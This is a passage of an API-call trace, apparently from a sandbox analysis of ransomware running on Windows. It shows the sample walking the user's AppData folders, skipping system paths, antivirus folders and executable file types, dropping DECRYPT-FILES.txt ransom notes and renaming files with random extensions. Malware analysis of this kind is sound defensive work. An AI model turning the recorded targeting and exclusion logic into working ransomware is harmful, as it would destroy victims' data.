param_1=0x36fdd64, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7.XGa24Tb") returned 112 [0180.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.y2ts7"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7.XGa24Tb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.y2ts7.xga24tb"), dwFlags=0x0) returned 1 [0180.876] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.876] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.876] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.876] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaafa7000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.877] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.877] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaafa7000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.877] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.877] CloseHandle (hObject=0x26c) returned 1 [0180.877] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0180.877] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0180.877] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0180.877] lstrcatW (in: lpString1="Speech", lpString2="\\" | out: lpString1="Speech\\") returned="Speech\\" [0180.877] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Speech\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Program Files") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch=":\\Windows") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Games\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\All Users") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="AhnLab") returned 0x0 [0180.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.877] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0180.877] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.877] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\0a16c9.tmp") returned 74 [0180.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0180.878] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.878] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\DECRYPT-FILES.txt") returned 81 [0180.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0180.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0180.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.878] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.878] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.878] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef05360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.878] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.879] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.879] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.879] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.879] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.879] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.879] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.879] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.879] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.879] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0180.879] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.879] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" [0180.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\0a16c9.tmp" [0180.879] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.879] CloseHandle (hObject=0x0) returned 0 [0180.879] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.879] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.880] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.880] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.880] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.880] CloseHandle (hObject=0x26c) returned 1 [0180.880] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0180.880] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0180.880] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0180.880] lstrcatW (in: lpString1="SystemCertificates", lpString2="\\" | out: lpString1="SystemCertificates\\") returned="SystemCertificates\\" [0180.880] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Program Files") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch=":\\Windows") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Games\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\All Users") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="AhnLab") returned 0x0 [0180.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0180.880] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.880] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\0a16c9.tmp") returned 86 [0180.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0180.881] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.881] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt") returned 93 [0180.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0180.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0180.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.881] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.881] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef05360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.882] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.882] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.882] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.882] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.882] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.882] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.882] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.882] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.882] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.882] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0180.882] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.882] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0180.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\0a16c9.tmp" [0180.882] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.882] CloseHandle (hObject=0x0) returned 0 [0180.882] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.882] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.883] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.883] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0180.883] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0180.883] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0180.883] lstrcatW (in: lpString1="My", lpString2="\\" | out: lpString1="My\\") returned="My\\" [0180.883] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 